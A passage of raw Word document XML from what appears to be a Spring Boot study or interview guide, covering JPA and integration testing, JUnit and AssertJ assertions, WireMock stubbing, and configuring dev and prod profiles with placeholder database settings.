    </w:p>
    <w:p w14:paraId="02700D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rue(result.isPresent());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5489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8AF98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538446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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14968D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 This annotation configures an in-memory database (H2 by default) and sets up a JPA test environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD4F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pository class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BB6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rue(result.isPresent()): Asserts that the entity is saved and retrievable from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033DAF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Testing with Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006482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configure different profiles for testing environments, for example, using application-test.properties for unit testing with specific configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDFEA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of application-test.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2026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h2:mem:testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567CF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driverClassName=org.h2.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9F67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sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50401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assword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465AEC2F"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7. Assertions in Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923A9D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w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit assertions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w: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more fluent and expressive assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5837134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JUnit assertions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBDF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Equals(expected, actual);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED78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NotNull(myEntity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CF0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AssertJ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18DF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isNotNull();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43317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getName()).isEqualTo("Test");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDF874"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8. Mocking REST Calls with WireMock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1399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f you need to mock external HTTP requests or REST API calls in your tests, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WireMock</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBC36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61332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29886F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72388D82" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E99A9B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810A42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617546F3" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2FC49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296F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ExternalAPI() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519B78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reMock.stubFor(get(urlEqualTo("/external-api"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1682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llReturn(aResponse().withBody("response")));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49250139" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BACC0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ponse = myService.callExternalApi();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D700AB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ponse).isEqualTo("response");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5726C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077918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61613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Best Practices for Unit Testing in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3800795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isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that each test is independent and does not rely on external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B576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 external dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @MockBean, Mockito, or WireMock to mock external dependencies such as databases, APIs, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50957D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both positive and negative cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure tests cover both expected and unexpected scenarios (e.g., invalid inputs, exceptions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120760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Use specific profiles for testing to separate test configurations from production configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40140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following these steps and practices, you can effectively write unit tests for your Spring Boot application to ensure reliability and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658232EC" w14:textId="7DF1217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746" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6648C" w14:textId="2C4244D5"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82" w:name="_Toc197867896"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is @SpringBootTest used for?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="682"/>
    </w:p>
    <w:p w14:paraId="0291A589" w14:textId="7CE5B392"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Key Use Cases of @SpringBootTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04A85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Integration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is commonly used for testing the integration of various components in a Spring Boot application, such as services, repositories, controllers, and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA098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Entire Application Context</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to load the entire Spring application context, including all the beans, configurations, and environment properties, to test how the application behaves as a whole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0CAC0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nd-to-End Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For testing the full flow from the controller down to the database or any other integrated system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F770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SpringBootTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF651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AA0EB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A6DAAA0" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3794B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0B50189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ACC9EAB" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36EFCDF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8BDD11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150ABD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580B9AB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Expected Result", result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C37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13C3A3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E91A23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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408590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Tells Spring to start the full application context for testing. It mimics a real-world environment and ensures that all beans and configurations are loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CBE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service or component into the test class to be tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B0D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Denotes the method as a test method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A893743"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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19D7C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tarts the Spring Boot Application Context</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It loads the full Spring context, including all the beans configured in the application. This is ideal for integration tests where you need to verify how components work together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377263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WebEnvironment Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ebEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02746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4612259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4139C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TestRestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FD2D1" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B78A0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635CEF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Controller() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951663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ResponseEntity&lt;String&gt; response = restTemplate.getForEntity("/api/test", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CC562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HttpStatus.OK, response.getStatusCode());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412ED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53378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2A7A0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ntrol Over Context Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Pros of Using @SpringBootTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2089CE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mprehensive Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows for integration testing of the entire application, ensuring that components work together as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF4D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imulates Real-World Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It runs the application context as it would in production, so it closely simulates actual runtime behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFE34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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEFC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lower than Unit Tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since @SpringBootTest loads the full application context, it can be slower than more isolated unit tests, so it’s usually not suitable for simple unit tests where you mock dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1CEAB" w14:textId="3D01263C"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747" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B205F" w14:textId="00A9D3B6"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83" w:name="_Toc197867897"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How do you configure multiple environments (dev, prod)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="683"/>
    </w:p>
    <w:p w14:paraId="2DC60194" w14:textId="3BF3750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n Spring Boot, you can configure multiple environments (e.g., dev, prod, test, etc.) by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Spring profiles allow you to separate the configuration for different environments, so that you can have specific configurations for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203764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teps to Configure Multiple Environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D00A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Define Profiles in application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DDE8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define environment-specific configurations in separate application-{profile}.properties or application-{profile}.yml files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1EB99D"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application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3997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fault Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for common properties):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E37DD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225F74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application.name=my-application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430AF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erver.port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604001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velopment Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328361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properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538614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localhost:3306/devdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF88AE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devuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF59D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devpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96F37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Production Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0606B3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properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2255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prod-db-server:3306/proddb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225BC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produser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADE5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rodpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565961B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Use @Profile Annotation in Java Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E06E6C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use the @Profile annotation on beans to specify which profile they belong to. This allows you to create beans that are only loaded in certain environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF26D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1217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500F994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dev")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177E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DevConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA490C3" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1752883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5440A9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4FB864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Development specific datasource configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFC1B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41B89BD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23F9731" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9817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31DBC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prod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58700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ProdConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34E96B" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EBA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0F318F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7B62DB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Production specific datasource configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A91B2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626B0C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3FDBCCB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Activate a Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A7D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ctivate a profile in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB98CD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Command Line</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add --spring.profiles.active=dev (or prod) when running your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E002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6039D5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profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6F1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application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can specify the active profile directly in your application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669573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4242DD9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1A3B24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spring.profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4A8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Environment Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C928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port SPRING_PROFILES_ACTIVE=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDCE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SpringBootApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also set the active profile using the @SpringBootApplication annotation by specifying it in the main() method or through a @Configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDBC10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Using Profile-Specific Configuration Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A2A1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 Boot will automatically load the correct profile-specific configuration file based on the active profile. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7CFBA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dev.properties for the dev profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE62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prod.properties for the prod profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB109F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YAML files (application-dev.yml, application-prod.yml) if you prefer YAML configuration format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED945F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YAML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DF5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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAA1C5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C0F3CE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ofiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F71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ctive: dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDE586" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BAF88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A3966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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710D7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7C32156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286BE7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localhost:3306/devdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7DC1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devuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B24E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devpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68DBFC" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CBF9C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C1C496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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438F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8A88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03A156D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prod-db-server:3306/proddb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C25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produser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D6B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prodpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F4D2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Different Profiles for Different Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1FA4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profiles to load environment-specific configurations for services like databases, logging, security, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7C9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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04223D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dev profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for development configurations with lower security, debug-level logging, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E4FF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prod profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for production configurations with stronger security, production-level logging, and performance tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F536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Override Properties with Command-Line Arguments or @Value</w:t>
      </w:r>
    </w:p>
